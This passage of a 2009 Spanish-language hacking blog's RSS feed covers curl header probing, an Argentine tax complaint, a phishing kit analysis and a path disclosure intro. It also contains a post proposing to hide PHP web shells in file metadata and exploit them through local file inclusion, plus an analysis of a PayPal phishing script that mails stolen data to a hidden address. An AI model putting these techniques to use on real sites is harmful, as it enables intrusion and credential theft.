pocas cabeceras, se puede agregar mas para que parezca de un usuario normal) usándo los métodos GET, OPTIONS o HEAD y muestra lo mas interesante de la respuesta.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://foro.undersecurity.net/profile.php?41,3"&gt;C1c4Tr1Z&lt;/a&gt; (&lt;a href="http://voodoo-labs.org/blog/"&gt;Blog&lt;/a&gt;) me respondió con una version mucho mas corta usando curl (tiene cosas a favor y en contra):&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Te recomendaría usar curl:&lt;br /&gt;&lt;pre class="bbcode_geshi" style="overflow: auto;"&gt;&lt;div class="head"&gt;Language: Bash&lt;/div&gt;c1c4tr1z&lt;span class="br0"&gt;(&lt;/span&gt;bash&lt;span class="br0"&gt;)&lt;/span&gt; % ~ $ &lt;span class="re2"&gt;data=&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt; localhost OPTIONS &lt;span class="br0"&gt;)&lt;/span&gt;;curl -X &lt;span class="st0"&gt;"${data[1]}"&lt;/span&gt; -H &lt;span class="st0"&gt;"Host: ${data[0]}"&lt;/span&gt; -I -A &lt;span class="st0"&gt;"one-user-agent/1.1.1.1"&lt;/span&gt; $&lt;span class="br0"&gt;{&lt;/span&gt;data&lt;span class="br0"&gt;[&lt;/span&gt;&lt;span class="nu0"&gt;0&lt;/span&gt;&lt;span class="br0"&gt;]&lt;/span&gt;&lt;span class="br0"&gt;}&lt;/span&gt;&lt;br /&gt;HTTP/&lt;span class="nu0"&gt;1.1&lt;/span&gt; &lt;span class="nu0"&gt;200&lt;/span&gt; OK&lt;br /&gt;Date: Thu, &lt;span class="nu0"&gt;04&lt;/span&gt; Jun &lt;span class="nu0"&gt;2009&lt;/span&gt; &lt;span class="nu0"&gt;00&lt;/span&gt;:&lt;span class="nu0"&gt;40&lt;/span&gt;:&lt;span class="nu0"&gt;53&lt;/span&gt; GMT&lt;br /&gt;Server: Apache&lt;br /&gt;Allow: GET,HEAD,POST,OPTIONS,TRACE&lt;br /&gt;Content-Length: &lt;span class="nu0"&gt;0&lt;/span&gt;&lt;br /&gt;Content-Type: httpd/unix-directory&lt;/pre&gt;&lt;br /&gt;Pero despues se podría hacer mas especifico con awk , por ejemplo, para checkear si nos responde con un código 200 (OK):&lt;br /&gt;&lt;pre class="bbcode_geshi"style="overflow: auto;"&gt;&lt;div class="head"&gt;Language: Bash&lt;/div&gt;c1c4tr1z&lt;span class="br0"&gt;(&lt;/span&gt;bash&lt;span class="br0"&gt;)&lt;/span&gt; % ~ $ &lt;span class="re2"&gt;data=&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt; localhost OPTIONS &lt;span class="br0"&gt;)&lt;/span&gt;;curl -X &lt;span class="st0"&gt;"${data[1]}"&lt;/span&gt; -H &lt;span class="st0"&gt;"Host: ${data[0]}"&lt;/span&gt; -I -A &lt;span class="st0"&gt;"one-user-agent/1.1.1.1"&lt;/span&gt; $&lt;span class="br0"&gt;{&lt;/span&gt;data&lt;span class="br0"&gt;[&lt;/span&gt;&lt;span class="nu0"&gt;0&lt;/span&gt;&lt;span class="br0"&gt;]&lt;/span&gt;&lt;span class="br0"&gt;}&lt;/span&gt; | &lt;span class="kw2"&gt;awk&lt;/span&gt; &lt;span class="st0"&gt;'&lt;br /&gt;BEGIN{a=0}&lt;br /&gt;$1~/^HTTP&lt;span class="es0"&gt;\/&lt;/span&gt;1&lt;span class="es0"&gt;\.&lt;/span&gt;[0-1]$/{if($2=="200"){a=1}}&lt;br /&gt;{if(a==1){print$0}}'&lt;/span&gt;&lt;br /&gt;% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current&lt;br /&gt;                            Dload  Upload   Total   Spent    Left  Speed&lt;br /&gt;&lt;span class="nu0"&gt;0&lt;/span&gt;     &lt;span class="nu0"&gt;0&lt;/span&gt;    &lt;span class="nu0"&gt;0&lt;/span&gt;     &lt;span class="nu0"&gt;0&lt;/span&gt;    &lt;span class="nu0"&gt;0&lt;/span&gt;     &lt;span class="nu0"&gt;0&lt;/span&gt;      &lt;span class="nu0"&gt;0&lt;/span&gt;      &lt;span class="nu0"&gt;0&lt;/span&gt; --:--:-- --:--:-- --:--:--     &lt;span class="nu0"&gt;0&lt;/span&gt;&lt;br /&gt;HTTP/&lt;span class="nu0"&gt;1.1&lt;/span&gt; &lt;span class="nu0"&gt;200&lt;/span&gt; OK&lt;br /&gt;Date: Thu, &lt;span class="nu0"&gt;04&lt;/span&gt; Jun &lt;span class="nu0"&gt;2009&lt;/span&gt; &lt;span class="nu0"&gt;00&lt;/span&gt;:&lt;span class="nu0"&gt;51&lt;/span&gt;:&lt;span class="nu0"&gt;38&lt;/span&gt; GMT&lt;br /&gt;Server: Apache&lt;br /&gt;Allow: GET,HEAD,POST,OPTIONS,TRACE&lt;br /&gt;Content-Length: &lt;span class="nu0"&gt;0&lt;/span&gt;&lt;br /&gt;Content-Type: httpd/unix-directory&lt;br /&gt;&lt;br /&gt;c1c4tr1z&lt;span class="br0"&gt;(&lt;/span&gt;bash&lt;span class="br0"&gt;)&lt;/span&gt; % ~ $ &lt;span class="re2"&gt;data=&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt; localhost/no-existe/ OPTIONS &lt;span class="br0"&gt;)&lt;/span&gt;;curl -X &lt;span class="st0"&gt;"${data[1]}"&lt;/span&gt; -H &lt;span class="st0"&gt;"Host: ${data[0]}"&lt;/span&gt; -I -A &lt;span class="st0"&gt;"one-user-agent/1.1.1.1"&lt;/span&gt; $&lt;span class="br0"&gt;{&lt;/span&gt;data&lt;span class="br0"&gt;[&lt;/span&gt;&lt;span class="nu0"&gt;0&lt;/span&gt;&lt;span class="br0"&gt;]&lt;/span&gt;&lt;span class="br0"&gt;}&lt;/span&gt; | &lt;span class="kw2"&gt;awk&lt;/span&gt; &lt;span class="st0"&gt;'&lt;br /&gt;BEGIN{a=0}&lt;br /&gt;$1~/^HTTP&lt;span class="es0"&gt;\/&lt;/span&gt;1&lt;span class="es0"&gt;\.&lt;/span&gt;[0-1]$/{if($2=="200"){a=1}}&lt;br /&gt;{if(a==1){print$0}}'&lt;/span&gt;&lt;br /&gt;% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current&lt;br /&gt;                            Dload  Upload   Total   Spent    Left  Speed&lt;br /&gt;&lt;span class="nu0"&gt;0&lt;/span&gt;   &lt;span class="nu0"&gt;296&lt;/span&gt;    &lt;span class="nu0"&gt;0&lt;/span&gt;     &lt;span class="nu0"&gt;0&lt;/span&gt;    &lt;span class="nu0"&gt;0&lt;/span&gt;     &lt;span class="nu0"&gt;0&lt;/span&gt;      &lt;span class="nu0"&gt;0&lt;/span&gt;      &lt;span class="nu0"&gt;0&lt;/span&gt; --:--:-- --:--:-- --:--:--     &lt;span class="nu0"&gt;0&lt;/span&gt;&lt;br /&gt;c1c4tr1z&lt;span class="br0"&gt;(&lt;/span&gt;bash&lt;span class="br0"&gt;)&lt;/span&gt; % ~ $&lt;/pre&gt; Entonces, si el código HTTP devuelto es 200 (OK) el valor de a, que comienza siendo 0, va a ser 1 lo que haría que awk de como output todo el resultado de la cabecera.&lt;/blockquote&gt;Si querés mas información del tema:&lt;br /&gt;&lt;a href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html"&gt;HTTP/1.1: Header Field Definitions&lt;/a&gt;&lt;br /&gt;&lt;a href="http://0verl0ad.blogspot.com/search/label/HTTP"&gt;Posts sobre http en el blog&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;No necesito que me digan que no soy bueno en bash, pero acepto sugerencias, mejoras, opiniones, etc.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-3442741119672702929?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=jmthyOaKmPQ:j9l_QYHaGZc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/jmthyOaKmPQ" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-06-04T22:00:13.564+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><category domain="http://rss.financialcontent.com/stocksymbol">OK</category><feedburner:origLink>http://0verl0ad.blogspot.com/2009/06/serverinfo-01.html</feedburner:origLink></item><item><title>Impuestazo tecnológico en Argentina</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/tjV4WyI5d-0/impuestazo-tecnologico-en-argentina.html</link><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Thu, 21 May 2009 14:01:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-8554039244987595820</guid><description>&lt;blockquote&gt;En estos días el Congreso de la Nación debatirá el Proyecto de Ley 07-PE-09 (impulsado por el Gobierno Nacional) que aumenta la tasa de IVA del 10.5% a 21% para productos TIC (notebooks, monitores, cámaras de fotos y celulares y productos de otros sectores como aires acondicionados, etc); además, modifica la Ley de Impuestos Internos, gravando dichos productos con una alícuota del 20,48%.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;¿Qué significa esto para el consumidor común y corriente?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Un incremento promedio de precios de esos productos aproximadamente del 30% al 40%, con un impacto directo para todos nosotros y sobre todo para los sectores de menores ingresos.&lt;br /&gt;Este impuestazo llevaría necesariamente al aumento de precios de todos estos productos.&lt;/blockquote&gt;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Creo que ya estan suficientemente caras las cosas como para subir mas el precio. Se acuerdan de los incentivos como el plan MiPC? que pasó?&lt;br /&gt;Pueden bajarse el pdf con el proyecto &lt;a href="http://www1.hcdn.gov.ar/dependencias/dsecretaria/Periodo2009/PDF2009/TP2009/0007-PE-09.pdf"&gt;aca&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;En una parte dice:&lt;br /&gt;&lt;blockquote&gt;Por otra parte, importa incorporar al objeto del&lt;br /&gt;gravamen que nos ocupa, determinados productos suntuarios, de forma tal que quienes más&lt;br /&gt;poseen colaboren en mayor medida en la formación de las reservas necesarias para&lt;br /&gt;enfrentar con mejores medios la crisis financiera internacional y de aquellos bienes que&lt;br /&gt;demandan un alto consumo energético, de manera tal de incentivar el uso racional de la&lt;br /&gt;energía, en consonancia con las políticas vigentes a nivel nacional e internacional.&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Según la RAE:&lt;blockquote&gt;suntuoso, sa.&lt;br /&gt;(Del lat. sumptuōsus).&lt;br /&gt;1. adj. Grande y costoso.&lt;br /&gt;2. adj. Dicho de una persona: Magnífica en su gasto y porte.&lt;br /&gt;&lt;/blockquote&gt;Claro, resulta que una computadora ahora es un lujo y no una herramienta y alguien que no sabe usar una computadora tiene las mismas oportunidades de trabajo que alguien que si lo sabe hacer.&lt;br /&gt;También habla de que colaboren "los que mas tienen". Los que mas tienen son los que gastan &lt;a href="http://www.cristina.com.ar/"&gt;millones robados a la gente&lt;/a&gt; en viajes y lujos o alguien que se compra una computadora para trabajar, aprender o acercarse a la tecnologia?&lt;br /&gt;&lt;br /&gt;El proyecto se va a tratar despues del 28 de junio, mientras pueden informarse en &lt;a href="http://no-al-impuestazo-tecnologico.blogspot.com/"&gt;http://no-al-impuestazo-tecnologico.blogspot.com/&lt;/a&gt; e intentar mostrar su descontento a los diputados &lt;a href="http://no-al-impuestazo-tecnologico.blogspot.com/2009/05/oponete-mandando-e-mail-los-diputados.html"&gt;enviandoles un email&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Ojo, que también es culpa de todos nosotros (en realidad yo no porque todavia no voto, pero hablo del pueblo en general) por votar a estos garcas. Estaria bueno que todos vean &lt;a href="http://www.youtube.com/watch?v=ccgMUvGKY44&amp;amp;eurl=http%3A%2F%2Fwww.youtube.com%2F&amp;amp;feature=player_embedded"&gt;este&lt;/a&gt; video.&lt;br /&gt;&lt;br /&gt;Me entere en &lt;a href="http://nicolaspadula.com/2009/05/17/impuesto-al-hardware-en-argentina/"&gt;NPGeek&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-8554039244987595820?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=tjV4WyI5d-0:Yp4RArDyQHw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/tjV4WyI5d-0" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-05-21T23:28:20.418+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><media:content url="http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~5/UUpPJCcs7AI/0007-PE-09.pdf" fileSize="525117" type="application/pdf" /><itunes:explicit>no</itunes:explicit><itunes:subtitle>En estos días el Congreso de la Nación debatirá el Proyecto de Ley 07-PE-09 (impulsado por el Gobierno Nacional) que aumenta la tasa de IVA del 10.5% a 21% para productos TIC (notebooks, monitores, cámaras de fotos y celulares y productos de otros sectore</itunes:subtitle><itunes:author>Copyright: "Vengador de las Sombras"</itunes:author><itunes:summary>En estos días el Congreso de la Nación debatirá el Proyecto de Ley 07-PE-09 (impulsado por el Gobierno Nacional) que aumenta la tasa de IVA del 10.5% a 21% para productos TIC (notebooks, monitores, cámaras de fotos y celulares y productos de otros sectores como aires acondicionados, etc); además, modifica la Ley de Impuestos Internos, gravando dichos productos con una alícuota del 20,48%. ¿Qué significa esto para el consumidor común y corriente? Un incremento promedio de precios de esos productos aproximadamente del 30% al 40%, con un impacto directo para todos nosotros y sobre todo para los sectores de menores ingresos. Este impuestazo llevaría necesariamente al aumento de precios de todos estos productos. Creo que ya estan suficientemente caras las cosas como para subir mas el precio. Se acuerdan de los incentivos como el plan MiPC? que pasó? Pueden bajarse el pdf con el proyecto aca En una parte dice: Por otra parte, importa incorporar al objeto del gravamen que nos ocupa, determinados productos suntuarios, de forma tal que quienes más poseen colaboren en mayor medida en la formación de las reservas necesarias para enfrentar con mejores medios la crisis financiera internacional y de aquellos bienes que demandan un alto consumo energético, de manera tal de incentivar el uso racional de la energía, en consonancia con las políticas vigentes a nivel nacional e internacional. Según la RAE:suntuoso, sa. (Del lat. sumptuōsus). 1. adj. Grande y costoso. 2. adj. Dicho de una persona: Magnífica en su gasto y porte. Claro, resulta que una computadora ahora es un lujo y no una herramienta y alguien que no sabe usar una computadora tiene las mismas oportunidades de trabajo que alguien que si lo sabe hacer. También habla de que colaboren "los que mas tienen". Los que mas tienen son los que gastan millones robados a la gente en viajes y lujos o alguien que se compra una computadora para trabajar, aprender o acercarse a la tecnologia? El proyecto se va a tratar despues del 28 de junio, mientras pueden informarse en http://no-al-impuestazo-tecnologico.blogspot.com/ e intentar mostrar su descontento a los diputados enviandoles un email. Ojo, que también es culpa de todos nosotros (en realidad yo no porque todavia no voto, pero hablo del pueblo en general) por votar a estos garcas. Estaria bueno que todos vean este video. Me entere en NPGeek</itunes:summary><itunes:keywords>Hack,hacking,hackers</itunes:keywords><feedburner:origLink>http://0verl0ad.blogspot.com/2009/05/impuestazo-tecnologico-en-argentina.html</feedburner:origLink><enclosure url="http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~5/UUpPJCcs7AI/0007-PE-09.pdf" length="525117" type="application/pdf" /><feedburner:origEnclosureLink>http://www1.hcdn.gov.ar/dependencias/dsecretaria/Periodo2009/PDF2009/TP2009/0007-PE-09.pdf</feedburner:origEnclosureLink></item><item><title>Metadatos IV: File inclusion &amp; malicious metadata</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/2jWuAl-v88E/metadatos-iv-file-inclusion-malicious.html</link><category>File Inclusion</category><category>Metadatos</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Mon, 04 May 2009 06:38:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-7124506563835960308</guid><description>Saludos!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Todo el mundo sabe que si una web tiene una vulnerabilidad LFI, y además cuenta con un uploader de imágenes (avatares, firmas, cosas así por ejemplo) o cualquier otro fichero, estás más que jodido. Normalmente simplemente tus shell.php la renombrabas a .jpeg, subías y fin, pero, hace ya un par de años hubo una persona que pensó más allá y se le ocurrió la magnífica idea de incluir la shell dentro de una imagen ya existente sin que esta se vea modificada, de tal forma que tú pudieras visualizar la imagen y así pasar desapercibida la shell. Esta idea la publicó CodeBreak en un paper llamado "&lt;a href="http://www.milw0rm.com/video/watch.php?id=57"&gt;Local JPEG Inclusion&lt;/a&gt;".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora bien, y si ampliamos el espectro de extensiones al subir, es decir, no solo modificar de forma inapreciable una imagen, sino hacerlo con cualquier extensión que nos permita modificar sus metadatos. Esta es una gran idea: inyectar PHP en los metadatos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno, la verdad es que no tengo tiempo de probar algunas herramientas para hacer esto, por lo que os encomiendo a vosotros que probeis herramientas como exiftool y me digais los resultados.&lt;br /&gt;&lt;br /&gt;PD: ya sé que es un post muy corto, pero no ando con tiempo de explayarme más.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-7124506563835960308?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=2jWuAl-v88E:LYfu1YtdkzI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/2jWuAl-v88E" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-06-07T22:33:54.862+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/05/metadatos-iv-file-inclusion-malicious.html</feedburner:origLink></item><item><title>Metes la mano en la lata y tenes la de otro en el bolsillo...</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/8A-Xsp65Gj8/metes-la-mano-en-la-lata-y-tenes-la-de.html</link><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Thu, 23 Apr 2009 16:44:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-1991614419239375272</guid><description>Ayer (del dia en que empece a escribir el post, ya pasó mas tiempo)alguien que vamos a llamar "Señor G", me paso un... llamemoslo "script curiosamente parecido al login de paypal" para que lo mire (esto si es en serio, nunca pense en usarlo) y revise por que no andaba.&lt;br /&gt;La línea que no andaba usa una función que no conosco, pero ese no es el tema del post. Lo que pasa es que mirando el código vi algo raro, fijense ustedes:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://img117.imageshack.us/img117/3596/scam.png"&gt;&lt;img src="http://img117.imageshack.us/img117/3596/scam.png" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Para que todo esté mas claro, voy a modificar el código para que muestre el valor de las variables:&lt;br /&gt;&lt;a href="http://img253.imageshack.us/img253/1834/scamj.png"&gt;&lt;img src="http://img253.imageshack.us/img253/1834/scamj.png" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr&gt;&lt;br /&gt;&lt;b&gt;seth@Tux:~/Desktop$ php scam.php&lt;/b&gt;&lt;i&gt;&lt;br /&gt;El valor de $ar es&lt;br /&gt;Array&lt;br /&gt;(&lt;br /&gt;    [dont] =&gt; suck&lt;br /&gt;    [remove] =&gt; ea&lt;br /&gt;    [its] =&gt; ndo&lt;br /&gt;    [good] =&gt; @&lt;br /&gt;    [for] =&gt; gm&lt;br /&gt;    [your] =&gt; ail.&lt;br /&gt;    [scam] =&gt; com&lt;br /&gt;)&lt;br /&gt;&lt;br /&gt;Valor de $to: "suckeando@gmail.com"&lt;br /&gt;Warning: file_get_contents(index.htm): failed to open stream: No such file or directory in /home/seth/Desktop/scam.php on line 13&lt;br /&gt;&lt;br /&gt;El valor de $arr es&lt;br /&gt;Array&lt;br /&gt;(&lt;br /&gt;    [0] =&gt; usuario@dominio.tld&lt;br /&gt;    [1] =&gt;&lt;br /&gt;)&lt;br /&gt;&lt;br /&gt;Opa! email nuevo&lt;br /&gt;Destinatario: "usuario@dominio.tld"&lt;br /&gt;Asunto: "PaYPaL USA Bank ReZuLtAdOs DeL Spam"&lt;br /&gt;Mensaje: "todos los datos robados"&lt;br /&gt;Cabeceras:&lt;br /&gt;"From: PeiPei&lt;webmaster@regalos.com&gt;&lt;br /&gt;MIME-Version: 1.0&lt;br /&gt;"&lt;br /&gt;&lt;br /&gt;Opa! email nuevo&lt;br /&gt;Destinatario: "suckeando@gmail.com"&lt;br /&gt;Asunto: "PaYPaL USA Bank ReZuLtAdOs DeL Spam"&lt;br /&gt;Mensaje: "todos los datos robados"&lt;br /&gt;Cabeceras:&lt;br /&gt;"From: PeiPei&lt;webmaster@regalos.com&gt;&lt;br /&gt;MIME-Version: 1.0&lt;br /&gt;"&lt;br /&gt;&lt;br /&gt;Opa! email nuevo&lt;br /&gt;Destinatario: ""&lt;br /&gt;Asunto: "PaYPaL USA Bank ReZuLtAdOs DeL Spam"&lt;br /&gt;Mensaje: "todos los datos robados"&lt;br /&gt;Cabeceras:&lt;br /&gt;"From: PeiPei&lt;webmaster@regalos.com&gt;&lt;br /&gt;MIME-Version: 1.0&lt;br /&gt;"&lt;br /&gt;&lt;br /&gt;Opa! email nuevo&lt;br /&gt;Destinatario: "suckeando@gmail.com"&lt;br /&gt;Asunto: "PaYPaL USA Bank ReZuLtAdOs DeL Spam"&lt;br /&gt;Mensaje: "todos los datos robados"&lt;br /&gt;Cabeceras:&lt;br /&gt;"From: PeiPei&lt;webmaster@regalos.com&gt;&lt;br /&gt;MIME-Version: 1.0&lt;br /&gt;"&lt;br /&gt;&lt;br /&gt;Enviando cabecera:"Location: Thanks.htm"&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;hr&gt;&lt;br /&gt;&lt;br /&gt;A ver si se entiende, todo lo que se hace con $ar es lo mismo que&lt;br /&gt;&lt;i&gt;$to="suckeando@gmail.com"&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Despues se crea el array $arr con tu email y $IP (antes se pone el ip del que se le roban los datos, asi que no se que es)&lt;br /&gt;&lt;br /&gt;Mas tarde se entra en un bucle que recorre ese array y manda el email a $IP (???), $send (vos) y $to (dos veces).&lt;br /&gt;&lt;br /&gt;Al final se redirije al usuario a Thanks.htm para que no sospeche&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-1991614419239375272?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=8A-Xsp65Gj8:HmvZt9T-ykI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/8A-Xsp65Gj8" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-04-30T01:00:10.388+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/04/metes-la-mano-en-la-lata-y-tenes-la-de.html</feedburner:origLink></item><item><title>Flisol 09</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/QOacNXn4Kxc/flisol-09.html</link><category>Flisol</category><category>Software libre</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Tue, 21 Apr 2009 14:58:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-8648074297234898633</guid><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://preguntaslinux.org/imagesPL/headbox.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 600px; height: 300px;" src="http://preguntaslinux.org/imagesPL/headbox.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Pueden buscar una reunión cerca de donde viven &lt;a href="http://www.installfest.net/FLISOL2009/Ciudades"&gt;aca&lt;/a&gt;. Si tienen varias cerca, mirenlas todas porque capaz hacen unos kilómetros mas y consiguen mejores charlas, que te presten monitores, etc.&lt;br /&gt;&lt;br /&gt;¿Quién lo organiza?&lt;br /&gt;&lt;br /&gt;La Comunidad de Software Libre en Latinoamérica, conformada por personas y grupos de diversa índole, con el apoyo de otras entidades, principalmente educativas, y algunos patrocinadores de los eventos en cada localidad.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;¿A quién está dirigido?&lt;br /&gt;&lt;br /&gt;El evento está dirigido a todo tipo de público: estudiantes, académicos, empresarios, trabajadores, funcionarios públcios, entusiastas y aun personas que no poseen mucho conocimiento informático.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;¿Cuánto cuesta?&lt;br /&gt;&lt;br /&gt;La asistencia al evento es totalmente libre y gratuita.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;¿Qué beneficios obtengo?&lt;br /&gt;&lt;br /&gt;Tendrás la oportunidad de instalar software libre en tu computadora, apreciar qué es una real y segura alternativa a otros modelos de desarrollo y distribución de software.&lt;br /&gt;&lt;br /&gt;Informarte sobre la filosofía, cultura y organización alrededor del mismo.&lt;br /&gt;Conocer las experiencias, desarrollos e investigaciones de grupos y entidades en torno al Software Libre, tanto a nivel local como nacional e internacional.&lt;br /&gt;&lt;br /&gt;Tal vez encuentres una alternativa/solución en software libre para ti, tu empresa, colegio, universidad e, incluso, para tu gobierno.&lt;br /&gt;&lt;br /&gt;Podrás aclarar tus dudas acerca de los temas relacionados y, quizás encuentres en el software libre, una alternativa de investigación, empleo y desarrollo tecnológico.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-8648074297234898633?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=QOacNXn4Kxc:a9BjpnmzOaI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/QOacNXn4Kxc" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-04-24T00:03:54.076+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/04/flisol-09.html</feedburner:origLink></item><item><title>Full Path Disclosure [FPD]</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/7Kt43lKPi5Y/full-path-disclosure-fpd.html</link><category>Otras Vulnerabilidades</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Mon, 13 Apr 2009 15:36:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-4187440302561500059</guid><description>Saludos a todos,&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hace ya tiempo que no hago mención a alguna vulnerabilidad de esas que consideramos de Regional Preferente... me refiero a esas que medio mundo desprecia, y el otro medio cuando algún colgado (como el servidor aquí presente) explica dicen aquello de... AHH ¿Pero esto es una vulnerabilidad?. Y como no podría ser de otra forma, el Full Path Disclosure, es una entra en esta categoría... ¡tan innecesarias y útiles a la vez!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;De su propio nombre podemos imaginarnos con una probabilidad de éxito cerca al 0'87 (eliminamos a aquellos que ni jota de inglés x'D) qué es lo que hace esta vulnerabilidad. Si eres de esa pequeña franja que no se lo imagin... Se trata de poder ver las rutas reales del servidor. Si ves una web cualquiera, al estilo de www.ejemplo.mil/Prueba/Concepto/Index.php, y pecasemos de ingenuidad, podrías llegar a pensar que Index.php se encuentra en /home/Prueba/Concepto/Index.php, pero te aseguro que así no es. Lo más normal es que fuera /home/Victor/html_docs/Prueba/Concepto/Index.php, /home/Victor/html_public/web/Prueba/Concepto/Index.php, etc...&lt;br /&gt;&lt;br 